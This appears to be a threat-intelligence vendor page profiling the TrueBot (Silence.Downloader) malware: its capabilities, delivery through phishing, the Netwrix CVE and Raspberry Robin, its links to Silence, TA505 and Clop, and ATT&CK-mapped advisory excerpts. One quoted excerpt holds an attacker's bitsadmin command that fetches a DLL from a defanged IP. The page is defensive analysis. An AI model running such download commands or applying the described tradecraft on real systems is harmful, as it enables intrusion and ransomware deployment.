TrueBot, also known as Silence.Downloader, is a Windows malware family primarily used as a downloader and botnet component to establish command-and-control, profile infected hosts, and deliver follow-on payloads for financially motivated intrusion activity. It has been observed since at least 2017 and has been linked most consistently to the Silence group, with repeated reporting also connecting its operations and downstream use to TA505/FIN11- and Clop-associated activity. TrueBot has been used both as an initial foothold and as a post-compromise staging mechanism for broader enterprise intrusion, data theft, and ransomware operations.
Its core functionality includes host reconnaissance and command-and-control registration, typically collecting system identifiers such as computer and domain information, enumerating running processes, identifying security software, and in newer variants gathering screenshots, local network details, and Active Directory trust information. Reported variants can download and execute additional payloads in multiple formats, including executables, DLLs, scripts, and shellcode, with some versions capable of loading payloads directly in memory. TrueBot has been observed delivering or facilitating deployment of FlawedGrace/GraceWire and Cobalt Strike, and in some intrusions it formed part of attack chains that culminated in Clop ransomware and double-extortion activity. Associated post-compromise operations have included credential dumping from LSASS, lateral movement, remote session abuse, and data exfiltration, including use of a custom exfiltration utility referred to as Teleport.
Historically, TrueBot was delivered through phishing campaigns using malicious attachments or links, particularly in operations associated with Silence and broader TA505 tradecraft. From 2022 onward, reporting shows a shift toward additional delivery vectors, notably exploitation of CVE-2022-31199 in Netwrix Auditor and distribution via Raspberry Robin infections. Exploitation of vulnerable Netwrix Auditor deployments was notable because the affected service often operated with extensive privileges in Active Directory environments, making TrueBot a useful bridge from initial access to domain-wide compromise. Raspberry Robin has also been repeatedly observed delivering TrueBot as a second-stage payload on compromised Windows systems.
Operationally, TrueBot has been associated with financially motivated campaigns targeting organizations in North America and elsewhere, including activity affecting internet-exposed Windows servers and enterprises across multiple sectors. In Silence-linked intrusions, it has served as a remote administration and staging tool within attacks on financial institutions. In TA505- and Clop-linked operations, it has been used to support broader intrusion workflows involving reconnaissance, payload delivery, exfiltration, and ransomware deployment. The malware’s continued development, junk-code padding, in-memory loading support, and role in multi-stage intrusion chains make it a significant component of modern criminal operations centered on access brokerage, enterprise compromise, and extortion.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
6 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Netwrix vulnerability (CVE-2022-31199) based delivery ... we believe with high confidence that these events are the result of the exploitation of a vulnerability in Netwrix Auditor (CVE-2022-31199) ... “Netwrix Auditor is vulnerable to an insecure object deserialization issue that is caused by an unsecured .NET remoting service. An attacker can submit arbitrary objects to the application through this service to achieve remote code execution on Netwrix Auditor servers.” | Since August 2022, we have seen an increase in infections of Truebot (aka Silence.Downloader) malware.
soit sous la forme d’un document exploitant les CVE-2017-0199 et CVE-2017-11882 qui télécharge et exécute un fichier HTA contenant un VBScript ; | En cliquant sur la pièce jointe malveillante, la victime déclenche la propagation automatique au sein du système d’information (SI) de l’outil d’administration à distance Truebot (ou Silence.Downloader). Ce code malveillant, en communiquant avec le C2, est utilisé pour propager d’autres charges utiles.
soit sous la forme d’un document exploitant les CVE-2017-0199 et CVE-2017-11882 qui télécharge et exécute un fichier HTA contenant un VBScript ; | En cliquant sur la pièce jointe malveillante, la victime déclenche la propagation automatique au sein du système d’information (SI) de l’outil d’administration à distance Truebot (ou Silence.Downloader). Ce code malveillant, en communiquant avec le C2, est utilisé pour propager d’autres charges utiles.
The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF and enables an unauthenticated actor to execute malicious code remotely without credentials. | The FBI also identified information relating to the download and execution of command and control (C2) malware such as DiceLoader, TrueBot, and Cobalt Strike Beacons, although it is unclear at which stage in the attack these tools were executed.
In late January 2023, the CL0P ransomware group launched a campaign using a zero-day vulnerability, now catalogued as CVE-2023-0669, to target the GoAnywhere MFT platform.
Once they gained access to the server, they deployed the TrueBot malware, which has also been previously linked to the Clop ransomware operation.
7 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Il existe des liens de codes et d’infrastructure entre FlawedAmmyy et Truebot (aka Silence.Downloader)...
Since August 2022, we have seen an increase in infections of Truebot (aka Silence.Downloader) malware.
Since August 2022, we have seen an increase in infections of Truebot (aka Silence.Downloader) malware.
As recently as May 31, 2023, the authoring organizations have observed an increase in cyber threat actors using new malware variants of Truebot (also known as Silence.Downloader). Truebot is a botnet that has been used by malicious cyber groups like CL0P Ransomware Gang to collect and exfiltrate information from its target victims.
We found connections between ShadowSyndicate infrastructure and Cl0p/Truebot substantiating previous findings of GroupIB
The FBI also identified information relating to the download and execution of command and control (C2) malware such as DiceLoader, TrueBot, and Cobalt Strike Beacons, although it is unclear at which stage in the attack these tools were executed.
36 distinct techniques documented for this family, organized by ATT&CK tactic.
In October, a larger number of infections leveraged Raspberry Robin, a recent malware spread through USB drives, as a delivery vector.
During the investigation, we identified the source of the infection to be a malicious ad that the user encountered while looking to download Google Sheets. This ad redirected the user to a malicious page serving a downloader for StealC infostealer malware.
cyber threat actors have shifted tactics, exploiting, in observable manner, a remote code execution vulnerability (CVE-2022-31199) in Netwrix Auditor [T1190].
Recently, the attackers have shifted from using malicious emails as their primary delivery method to other techniques.
Ces courriels contiennent une pièce jointe malveillante : soit sous la forme d’un document Word contenant une macro ou un exploit ; soit sous la forme d’un fichier ZIP ou RAR contenant un fichier CHM ; soit sous la forme d’un document exploitant les CVE-2017-0199 et CVE-2017-11882 ... ; soit sous la forme d’un fichier .lnk.
Based on confirmation from open-source reporting and analytical findings of Truebot variants, the authoring organizations assess cyber threat actors are leveraging both phishing campaigns with malicious redirect hyperlinks... to deliver new Truebot malware variants.
Besides downloading and executing files, the malware is now able to load and execute additional modules and shellcodes in memory
C:\Windows\System32\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll
Besides downloading and executing files, the malware is now able to load and execute additional modules and shellcodes in memory
In August, we saw a small number of attacks that exploited a recent remote code execution vulnerability in Netwrix auditor.
This variant of Truebot malware is designed with over one gigabyte (GB) of junk code which functions to hinder detection and analysis efforts [T1027.001].
Next, it uses a .JSONIP extension... to create a thirteen character globally unique identifier (GUID)... [T1036].
Truebot malware can be hidden within various, legitimate file formats that are used for malicious purposes [T1036.008].
Several hours post initial access, Truebot has been observed injecting Cobalt Strike beacons into memory [T1055] in a dormant mode for the first few hours prior to initiating additional operations.
With this established connection, Truebot uses a second obfuscated domain to receive additional payloads [T1105], self-replicate across the environment [T1570], and/or delete files used in its operations [T1070.004].
the malicious process downloaded the Truebot .dll file and executed it using rundll32.exe.
the affected system’s computer and domain name [T1082][T1016], along with the newly generated GUID, are sent to a hard-coded URL in a POST request
Following the initial checks for system information, Truebot has the capability to enumerate all running processes [T1057].
Once a system is infected, the malware collects information and sends it to the attacker’s command and control (C2). This version collects additional information: a screenshot, the computer name, the local network name
Truebot also has the ability to discover ... system time metrics... to facilitate scheduling tasks [T1124].
This version collects additional information: a screenshot, the computer name, the local network name, and active directory trust relations.
Upon execution, the malware immediately begins to look for EDR and antivirus software.
In October, a larger number of infections leveraged Raspberry Robin, a recent malware spread through USB drives, as a delivery vector.
the HTTP communication includes new fields to include the network name and trust relations data and it is sent as a POST request with a parameter “q=<base64 encoded data>”.
327 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
19 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malware payload observed being distributed through Raspberry Robin access.
Named malware mentioned as appearing in the same subnets discussed; the content provides no additional technical description beyond this co-occurrence.
Botnet malware associated with ShadowSyndicate and linked to ransomware operations.
Downloader malware operation linked in the report to ShadowSyndicate infrastructure overlaps and to Cl0p/Evil Corp activity.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.